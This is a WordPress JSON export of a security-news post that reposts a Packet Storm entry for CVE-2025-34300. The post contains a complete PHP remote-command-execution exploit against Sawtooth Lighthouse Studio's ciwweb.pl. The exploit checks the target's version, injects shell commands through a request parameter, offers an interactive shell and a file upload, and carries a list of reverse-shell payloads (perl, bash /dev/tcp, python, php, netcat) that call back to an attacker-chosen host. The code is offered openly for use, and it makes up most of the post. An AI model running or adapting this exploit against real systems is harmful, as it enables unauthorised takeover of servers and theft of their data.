{"id":41670,"date":"2026-02-19T11:39:24","date_gmt":"2026-02-19T11:39:24","guid":{"rendered":"http:\/\/localhost\/?p=41670"},"modified":"2026-02-19T11:39:24","modified_gmt":"2026-02-19T11:39:24","slug":"sawtooth-lighthouse-studio-91614-remote-command-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41670","title":{"rendered":"\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution_PACKETSTORM:215864"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-19T16:33:40&#8243;,&#8221;description&#8221;:&#8221;Sawtooth Lighthouse Studio version 9.16.14 proof of concept remote command execution exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-19T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-19T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215864&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-34300&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Sawtooth Lighthouse Studio 9.16.14 RCE                                                                                      |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/sawtoothsoftware.com                                                                                                |\\n    =============================================================================================================================================\\n    \\n    [+] Summary    : CVE-2025-34300 represents a critical Remote Code Execution (RCE) vulnerability in Sawtooth Software&#8217;s Lighthouse Studio survey platform, specifically affecting the ciwweb.pl web application component\\n    \\n    [+] POC :\\n    \\n    # Vulnerability Check\\n    php exploit.php &#8211;url http:\/\/target.com &#8211;check\\n    \\n    # Command Execution\\n    php exploit.php &#8211;url http:\/\/target.com &#8211;cmd \\&#8221;whoami\\&#8221;\\n    \\n    # Interactive Shell\\n    php exploit.php &#8211;url http:\/\/target.com &#8211;shell\\n    \\n    # Reverse Shell\\n    php exploit.php &#8211;url http:\/\/target.com &#8211;reverse &#8211;lhost YOUR_IP &#8211;lport 4444\\n    \\n    \\u003c?php\\n    \\n    \\n    class CVE_2025_34300_Exploit {\\n        \\n        private $target_url;\\n        private $timeout = 30;\\n        private $proxy = null;\\n        \\n        public function __construct($target_url) {\\n            $this-\\u003etarget_url = rtrim($target_url, &#8216;\/&#8217;);\\n        }\\n        \\n        public function setProxy($proxy) {\\n            $this-\\u003eproxy = $proxy;\\n        }\\n    \\n        public function check() {\\n            echo \\&#8221;[*] Checking target: {$this-\\u003etarget_url}\\\\n\\&#8221;;\\n            \\n            $params = [\\n                &#8216;hid_javascript&#8217; =\\u003e &#8216;1&#8217;\\n            ];\\n            \\n            $response = $this-\\u003esendRequest(&#8216;\/cgi-bin\/ciwweb.pl&#8217;, $params);\\n            \\n            if (!$response) {\\n                echo \\&#8221;[-] No response from target\\\\n\\&#8221;;\\n                return false;\\n            }\\n    \\n            if (preg_match(&#8216;\/Lighthouse Studio (\\\\d+_\\\\d+_\\\\d+)\/&#8217;, $response, $matches)) {\\n                $version_str = str_replace(&#8216;_&#8217;, &#8216;.&#8217;, $matches[1]);\\n                echo \\&#8221;[+] Extracted version: {$version_str}\\\\n\\&#8221;;\\n    \\n                if (version_compare($version_str, &#8216;9.16.14&#8217;, &#8216;\\u003c&#8217;)) {\\n                    echo \\&#8221;[+] Target appears to be vulnerable!\\\\n\\&#8221;;\\n                    return true;\\n                } else {\\n                    echo \\&#8221;[-] Target is patched (version \\u003e= 9.16.14)\\\\n\\&#8221;;\\n                    return false;\\n                }\\n            }\\n    \\n            if (strpos($response, &#8216;Lighthouse Studio&#8217;) !== false) {\\n                echo \\&#8221;[+] Lighthouse Studio detected (version extraction failed)\\\\n\\&#8221;;\\n                return true;\\n            }\\n            \\n            echo \\&#8221;[-] Lighthouse Studio not detected\\\\n\\&#8221;;\\n            return false;\\n        }\\n    \\n        public function executeCommand($command) {\\n            echo \\&#8221;[*] Attempting to execute command: {$command}\\\\n\\&#8221;;\\n            $encoded_cmd = urlencode($command);\\n            $params = [\\n                &#8216;hid_javascript&#8217; =\\u003e &#8216;1&#8217;,\\n                &#8216;hid_Random_ACARAT&#8217; =\\u003e &#8216;[%`&#8217; . $command . &#8216;`%]&#8217;\\n            ];\\n            \\n            $response = $this-\\u003esendRequest(&#8216;\/cgi-bin\/ciwweb.pl&#8217;, $params);\\n            \\n            if (!$response) {\\n                echo \\&#8221;[-] No response received\\\\n\\&#8221;;\\n                return null;\\n            }\\n    \\n            if (preg_match(&#8216;\/\\\\[\\\\%`(.*?)`\\\\%\\\\]\/s&#8217;, $response, $matches)) {\\n                $output = $matches[1];\\n                echo \\&#8221;[+] Command output:\\\\n\\&#8221;;\\n                echo $output . \\&#8221;\\\\n\\&#8221;;\\n                return $output;\\n            }\\n            \\n            echo \\&#8221;[-] No command output found in response\\\\n\\&#8221;;\\n    \\n            if (strpos($response, &#8216;Cannot find the study name&#8217;) !== false) {\\n                echo \\&#8221;[-] Invalid STUDYNAME parameter\\\\n\\&#8221;;\\n            }\\n            \\n            return null;\\n        }\\n    \\n        public function reverseShell($lhost, $lport) {\\n            $payloads = [\\n                &#8216;perl&#8217; =\\u003e \\&#8221;perl -e &#8216;use Socket;\\\\$i=\\\\\\&#8221;$lhost\\\\\\&#8221;;\\\\$p=$lport;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\\\\&#8221;tcp\\\\\\&#8221;));if(connect(S,sockaddr_in(\\\\$p,inet_aton(\\\\$i)))){open(STDIN,\\\\\\&#8221;\\u003e\\u0026S\\\\\\&#8221;);open(STDOUT,\\\\\\&#8221;\\u003e\\u0026S\\\\\\&#8221;);open(STDERR,\\\\\\&#8221;\\u003e\\u0026S\\\\\\&#8221;);exec(\\\\\\&#8221;\/bin\/sh -i\\\\\\&#8221;);};&#8217;\\&#8221;,\\n                &#8216;bash&#8217; =\\u003e \\&#8221;bash -c &#8216;bash -i \\u003e\\u0026 \/dev\/tcp\/$lhost\/$lport 0\\u003e\\u00261&#8217;\\&#8221;,\\n                &#8216;python&#8217; =\\u003e \\&#8221;python -c &#8216;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\\\\&#8221;$lhost\\\\\\&#8221;,$lport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\\\\&#8221;\/bin\/sh\\\\\\&#8221;,\\\\\\&#8221;-i\\\\\\&#8221;]);&#8217;\\&#8221;,\\n                &#8216;php&#8217; =\\u003e \\&#8221;php -r &#8216;\\\\$sock=fsockopen(\\\\\\&#8221;$lhost\\\\\\&#8221;,$lport);exec(\\\\\\&#8221;\/bin\/sh -i \\u003c\\u00263 \\u003e\\u00263 2\\u003e\\u00263\\\\\\&#8221;);&#8217;\\&#8221;,\\n                &#8216;nc&#8217; =\\u003e \\&#8221;nc -e \/bin\/sh $lhost $lport || nc -c sh $lhost $lport || rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2\\u003e\\u00261|nc $lhost $lport \\u003e\/tmp\/f\\&#8221;\\n            ];\\n            \\n            echo \\&#8221;[*] Available reverse shell payloads:\\\\n\\&#8221;;\\n            foreach (array_keys($payloads) as $i =\\u003e $type) {\\n                echo \\&#8221;    [{$i}] {$type}\\\\n\\&#8221;;\\n            }\\n            \\n            echo \\&#8221;Select payload type: \\&#8221;;\\n            $choice = trim(fgets(STDIN));\\n            $types = array_keys($payloads);\\n            \\n            if (isset($types[$choice])) {\\n                $type = $types[$choice];\\n                $cmd = $payloads[$type];\\n                echo \\&#8221;[*] Using {$type} reverse shell\\\\n\\&#8221;;\\n                return $this-\\u003eexecuteCommand($cmd);\\n            }\\n            \\n            return null;\\n        }\\n    \\n        public function uploadFile($local_file, $remote_path) {\\n            if (!file_exists($local_file)) {\\n                echo \\&#8221;[-] Local file not found: {$local_file}\\\\n\\&#8221;;\\n                return false;\\n            }\\n            \\n            $content = file_get_contents($local_file);\\n            $encoded = base64_encode($content);\\n            $commands = [\\n                &#8216;linux&#8217; =\\u003e \\&#8221;echo &#8216;{$encoded}&#8217; | base64 -d \\u003e {$remote_path} \\u0026\\u0026 chmod +x {$remote_path}\\&#8221;,\\n                &#8216;windows&#8217; =\\u003e \\&#8221;powershell -Command \\\\\\&#8221;[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(&#8216;{$encoded}&#8217;)) | Out-File -FilePath &#8216;{$remote_path}&#8217;\\\\\\&#8221;\\&#8221;\\n            ];\\n    \\n            echo \\&#8221;[*] Attempting Linux file upload&#8230;\\\\n\\&#8221;;\\n            $result = $this-\\u003eexecuteCommand($commands[&#8216;linux&#8217;]);\\n            \\n            if ($result === null) {\\n                echo \\&#8221;[*] Attempting Windows file upload&#8230;\\\\n\\&#8221;;\\n                $result = $this-\\u003eexecuteCommand($commands[&#8216;windows&#8217;]);\\n            }\\n            \\n            return $result !== null;\\n        }\\n    \\n        private function sendRequest($path, $params = []) {\\n            $url = $this-\\u003etarget_url . $path;\\n            \\n            if (!empty($params)) {\\n                $url .= &#8216;?&#8217; . http_build_query($params);\\n            }\\n            \\n            $ch = curl_init();\\n            curl_setopt_array($ch, [\\n                CURLOPT_URL =\\u003e $url,\\n                CURLOPT_RETURNTRANSFER =\\u003e true,\\n                CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n                CURLOPT_FOLLOWLOCATION =\\u003e true,\\n                CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n                CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n                CURLOPT_USERAGENT =\\u003e &#8216;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36&#8217;\\n            ]);\\n            \\n            if ($this-\\u003eproxy) {\\n                curl_setopt($ch, CURLOPT_PROXY, $this-\\u003eproxy);\\n            }\\n            \\n            $response = curl_exec($ch);\\n            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n            \\n            if (curl_errno($ch)) {\\n                echo \\&#8221;[-] cURL error: \\&#8221; . curl_error($ch) . \\&#8221;\\\\n\\&#8221;;\\n                curl_close($ch);\\n                return false;\\n            }\\n            \\n            curl_close($ch);\\n            \\n            if ($http_code != 200) {\\n                echo \\&#8221;[-] HTTP {$http_code} received\\\\n\\&#8221;;\\n                return false;\\n            }\\n            \\n            return $response;\\n        }\\n    \\n        public function interactiveShell() {\\n            if (!$this-\\u003echeck()) {\\n                echo \\&#8221;[-] Target not vulnerable or check failed\\\\n\\&#8221;;\\n                return;\\n            }\\n            \\n            echo \\&#8221;[*] Starting interactive shell (type &#8216;exit&#8217; to quit)\\\\n\\&#8221;;\\n            \\n            while (true) {\\n                echo \\&#8221;cmd\\u003e \\&#8221;;\\n                $cmd = trim(fgets(STDIN));\\n                \\n                if (empty($cmd)) {\\n                    continue;\\n                }\\n                \\n                if (strtolower($cmd) == &#8216;exit&#8217; || strtolower($cmd) == &#8216;quit&#8217;) {\\n                    break;\\n                }\\n                \\n                $this-\\u003eexecuteCommand($cmd);\\n            }\\n        }\\n    }\\n    \\n    function showHelp() {\\n        echo \\&#8221;by indoushka Exploit &#8211; Sawtooth Lighthouse Studio RCE\\\\n\\&#8221;;\\n        echo \\&#8221;Usage:\\\\n\\&#8221;;\\n        echo \\&#8221;  php exploit.php &#8211;check &#8211;url http:\/\/target.com\\\\n\\&#8221;;\\n        echo \\&#8221;  php exploit.php &#8211;cmd \\\\\\&#8221;whoami\\\\\\&#8221; &#8211;url http:\/\/target.com\\\\n\\&#8221;;\\n        echo \\&#8221;  php exploit.php &#8211;shell &#8211;url http:\/\/target.com\\\\n\\&#8221;;\\n        echo \\&#8221;  php exploit.php &#8211;reverse &#8211;lhost 1.2.3.4 &#8211;lport 4444 &#8211;url http:\/\/target.com\\\\n\\&#8221;;\\n        echo \\&#8221;\\\\nOptions:\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;url       Target URL (required)\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;check     Check if vulnerable\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;cmd       Execute single command\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;shell     Start interactive shell\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;reverse   Start reverse shell\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;lhost     Listener IP for reverse shell\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;lport     Listener port for reverse shell\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;proxy     HTTP proxy (optional)\\\\n\\&#8221;;\\n        echo \\&#8221;  &#8211;upload    Upload file: &#8211;upload local.txt,\/remote\/path.txt\\\\n\\&#8221;;\\n    }\\n    \\n    if (php_sapi_name() === &#8216;cli&#8217;) {\\n        $options = getopt(&#8221;, [\\n            &#8216;url:&#8217;,\\n            &#8216;check&#8217;,\\n            &#8216;cmd:&#8217;,\\n            &#8216;shell&#8217;,\\n            &#8216;reverse&#8217;,\\n            &#8216;lhost:&#8217;,\\n            &#8216;lport:&#8217;,\\n            &#8216;proxy:&#8217;,\\n            &#8216;upload:&#8217;,\\n            &#8216;help&#8217;\\n        ]);\\n        \\n        if (isset($options[&#8216;help&#8217;]) || !isset($options[&#8216;url&#8217;])) {\\n            showHelp();\\n            exit();\\n        }\\n        \\n        $exploit = new CVE_2025_34300_Exploit($options[&#8216;url&#8217;]);\\n        \\n        if (isset($options[&#8216;proxy&#8217;])) {\\n            $exploit-\\u003esetProxy($options[&#8216;proxy&#8217;]);\\n        }\\n        \\n        if (isset($options[&#8216;check&#8217;])) {\\n            $exploit-\\u003echeck();\\n        } elseif (isset($options[&#8216;cmd&#8217;])) {\\n            $exploit-\\u003echeck();\\n            $exploit-\\u003eexecuteCommand($options[&#8216;cmd&#8217;]);\\n        } elseif (isset($options[&#8216;shell&#8217;])) {\\n            $exploit-\\u003einteractiveShell();\\n        } elseif (isset($options[&#8216;reverse&#8217;])) {\\n            if (!isset($options[&#8216;lhost&#8217;]) || !isset($options[&#8216;lport&#8217;])) {\\n                echo \\&#8221;[-] &#8211;lhost and &#8211;lport required for reverse shell\\\\n\\&#8221;;\\n                exit(1);\\n            }\\n            $exploit-\\u003echeck();\\n            $exploit-\\u003ereverseShell($options[&#8216;lhost&#8217;], $options[&#8216;lport&#8217;]);\\n        } elseif (isset($options[&#8216;upload&#8217;])) {\\n            list($local, $remote) = explode(&#8216;,&#8217;, $options[&#8216;upload&#8217;], 2);\\n            $exploit-\\u003echeck();\\n            $exploit-\\u003euploadFile($local, $remote);\\n        }\\n    } else {\\n        echo \\&#8221;This script is designed for command line use.\\\\n\\&#8221;;\\n        showHelp();\\n    }\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215864&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:10,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:H\/VI:H\/SI:H\/VA:H\/SA:H&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215864\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-19T16:33:40&#8243;,&#8221;description&#8221;:&#8221;Sawtooth Lighthouse Studio version 9.16.14 proof of concept remote command execution exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-19T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-19T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215864&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-34300&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n | # Title : Sawtooth Lighthouse&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-41670","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution_PACKETSTORM:215864 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41670\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution_PACKETSTORM:215864 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-19T16:33:40&#8243;,&#8221;description&#8221;:&#8221;Sawtooth Lighthouse Studio version 9.16.14 proof of concept remote command execution exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-19T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-19T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215864&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-34300&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : Sawtooth Lighthouse...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41670\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-19T11:39:24+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41670#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41670\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution_PACKETSTORM:215864\",\"datePublished\":\"2026-02-19T11:39:24+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41670\"},\"wordCount\":1532,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41670#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41670\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41670\",\"name\":\"\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution_PACKETSTORM:215864 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-19T11:39:24+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41670#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41670\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41670#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution_PACKETSTORM:215864\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution_PACKETSTORM:215864 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41670","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution_PACKETSTORM:215864 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-19T16:33:40&#8243;,&#8221;description&#8221;:&#8221;Sawtooth Lighthouse Studio version 9.16.14 proof of concept remote command execution exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-19T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-19T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215864&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-34300&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : Sawtooth Lighthouse...","og_url":"https:\/\/zero.redgem.net\/?p=41670","og_site_name":"zero redgem","article_published_time":"2026-02-19T11:39:24+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41670#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41670"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution_PACKETSTORM:215864","datePublished":"2026-02-19T11:39:24+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41670"},"wordCount":1532,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-10.0","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41670#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41670","url":"https:\/\/zero.redgem.net\/?p=41670","name":"\ud83d\udcc4 Sawtooth Lighthouse Studio 9.16.14 Remote Command Execution_PACKETSTORM:215864 - zero 